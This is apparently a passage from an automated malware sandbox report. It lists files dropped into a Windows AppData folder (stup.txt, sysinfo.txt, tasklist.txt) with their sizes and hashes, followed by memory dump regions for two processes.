4ae1ca8fd73519dbdba2300c5de61199370fe1885fb8bcf2da58afe846293b8a

SHA512
73f22a52e345a6259effe58400bfc199e1f93dfc67031535ccc6b1d643734aa39afa15d7fd2a2b9d98cda22b58a01780699b255eb6e16673c934e0898509979c

Download Submit
C:\Users\Admin\AppData\Roaming\stup.txt

Filesize
2B

MD5
81051bcc2cf1bedf378224b0a93e2877

SHA1
ba8ab5a0280b953aa97435ff8946cbcbb2755a27

SHA256
7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

SHA512
1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

Download Submit
C:\Users\Admin\AppData\Roaming\sysinfo.txt

Filesize
2KB

MD5
41a623b8d740e2abc6070ba5f72038e8

SHA1
672d99bb522428179279eeb0d8926226ef53c32b

SHA256
0baba5e65c356da9946eb23a6d778e0c74d917e075547ecc155b283b51b656a8

SHA512
17aea89bbbc7b3a9bf6b14ed7aa7abe874093d758047cb511c34463ceb78d88dad21b0d40b8b6fd8a9206cc8f092fe0d5158b416b9f8e0cb4f8a49c0c1fa2c91

Download Submit
C:\Users\Admin\AppData\Roaming\tasklist.txt

Filesize
7KB

MD5
190d15659fa192ff89cc735d9c42c68c

SHA1
9a93a1228e7dd91f65cefbc8e8e148b2496c765e

SHA256
6db1029095407994a715f425f468e1002ea39e53d1c7ae5d43abd63afdb37796

SHA512
1ccb44f2b4885d4a61ff72faadc23a4765a87546a161f04b712b87a316fe68f41699f2e976a880d2941658cf8dafeed384559ba818e2ea86aec6bf5ba0b56227

Download Submit
memory/3316-15-0x00007FFCD2A50000-0x00007FFCD3511000-memory.dmp

Filesize
10.8MB

Download
memory/3316-12-0x000001AB2CFC0000-0x000001AB2CFD0000-memory.dmp

Filesize
64KB

Download
memory/3316-11-0x000001AB2CFC0000-0x000001AB2CFD0000-memory.dmp

Filesize
64KB

Download
memory/3316-10-0x00007FFCD2A50000-0x00007FFCD3511000-memory.dmp

Filesize
10.8MB

Download
memory/3316-9-0x000001AB148C0000-0x000001AB148E2000-memory.dmp

Filesize
136KB

Download
memory/4132-27-0x00007FFCD2A50000-0x00007FFCD3511000-memory.dmp

Filesize
10.8MB

Download
memory/4132-32-0x00007FFCD2A50000-0x00007FFCD3511000-memory.dmp

Filesize
10.8MB

Download
memory/4132-30-0x00000144F82E0000-0x00000144F84A2000-memory.dmp

Filesize
1.8MB

Download
memory/4132-28-0x00000144F7320000-0x00000144F7330000-memory.dmp

Filesize
64KB

Download
memory/4132-29-0x00000144F7320000-0x00000144F7330000-memory.dmp

Filesize
64KB

Download